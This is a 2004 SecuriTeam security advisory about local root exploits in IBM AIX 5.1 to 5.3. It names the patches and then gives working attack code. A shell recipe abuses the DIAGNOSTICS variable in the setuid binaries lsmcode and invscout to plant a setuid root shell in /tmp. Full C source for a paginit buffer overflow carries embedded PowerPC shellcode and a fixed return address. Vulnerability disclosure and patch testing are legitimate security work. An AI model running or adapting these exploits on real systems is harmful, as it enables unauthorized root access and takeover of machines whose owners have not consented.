[EXPL] AIX paginit, lsmcode and invscout Local Exploits

Subject: [EXPL] AIX paginit, lsmcode and invscout Local Exploits
Date: 21 Dec 2004 18:12:22 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  AIX paginit, lsmcode and invscout Local Exploits
------------------------------------------------------------------------


SUMMARY

The following exploit code can be used to test your systems for the 
vulnerabilities in paginit, lsmcode and invscout that we partly reported 
in our previous advisory:  
<http://www.securiteam.com/unixfocus/6O00N0AC0A.html> IBM AIX invscout 
Local Command Execution Vulnerability.

DETAILS

Vulnerable Systems:
 * IBM's AIX versions 5.1, 5.2 and 5.3

Solution:
The vendor has been contacted and has released the following patches:
1) For the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and 
IY64277(5.3).
2) For the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2), and 
IY64312(5.3).

Diag vulnerability:
There are (at least) 4 broken suid binaries.
-r-sr-xr-x   1 root     system        10014 Sep 16 2002 /usr/sbin/lsmcode
-r-sr-x---   1 root     system         2796 Jan 26 2003 /usr/sbin/diag_exec
-r-sr-xr-x   1 root     system       450433 Apr 08 2004 /usr/sbin/invscout
-r-sr-xr-x   1 root     system       511362 Apr 08 2004 /usr/sbin/invscoutd

All these binaries are exploited the same way: the path set in the 
$DIAGNOSTICS environment variable is used by these binaries to execute 
$DIAGNOSTICS/bin/Dctrl as root, so an attacker-controlled directory 
yields an attacker-controlled Dctrl running as root.

Example:
Executing the following gives a root shell:

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

Paginit vulnerability:
The following setuid binary:
-r-sr-xr-x   1 root     security       7354 Mar 12 2003  /usr/bin/paginit

does not bounds-check its first command-line argument, which is 
supposed to be a username. If you feed paginit the proper data and hit 
enter, root privileges are gained.

Exploit:
/* exploit for /usr/bin/paginit
   tested on: AIX 5.2

   if the exploit fails it's because the shellcode
   ends up at a different address. use dbx to check,
   and change RETADDR accordingly.

   cees-bart <ceesb@cs.ru.nl>
*/

#include <string.h>   /* memset, memcpy */
#include <unistd.h>   /* execle */

#define RETADDR 0x2ff22c90

char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
;

char envlabel[] = "X=";

/* store x into buf as four big-endian bytes (PowerPC byte order) */
void printint(char* buf, int x) {
  buf[0] = x >> 24;
  buf[1] = (x >> 16) & 0xff;
  buf[2] = (x >> 8) & 0xff;
  buf[3] = x & 0xff;
}

int main(int argc, char **argv) {
  char *env[3];
  char code[1000];   /* environment string carrying the shellcode */
  char buf[8000];    /* overlong first argument (the "username") */
  char *p, *i;
  int offset1 = 0;

  offset1 = 0; // atoi(argv[1]);

  memset(code, 'C', sizeof(code));
  memcpy(code, envlabel, sizeof(envlabel)-1);
  // landingzone: the shellcode's first instruction, repeated
  for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4)
    printint(i, 0x7ca52a79);

  memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);
  code[sizeof(code)-1] = 0;

  env[0] = code;
  env[1] = 0;

  memset(buf, 'A', sizeof(buf));
  buf[sizeof(buf)-1] = 0;

  p = buf;
  p += 4114;
  printint(p, RETADDR); // try to hit the landingzone
  p += 72;
  printint(p, RETADDR); // any readable address (apparently not overwritten)

  execle("/usr/bin/paginit", "/usr/bin/paginit", buf, (char *)0, env);
  return 1; // only reached if execle fails
}


ADDITIONAL INFORMATION

The information has been provided by cees-bart <ceesb@cs.ru.nl>.


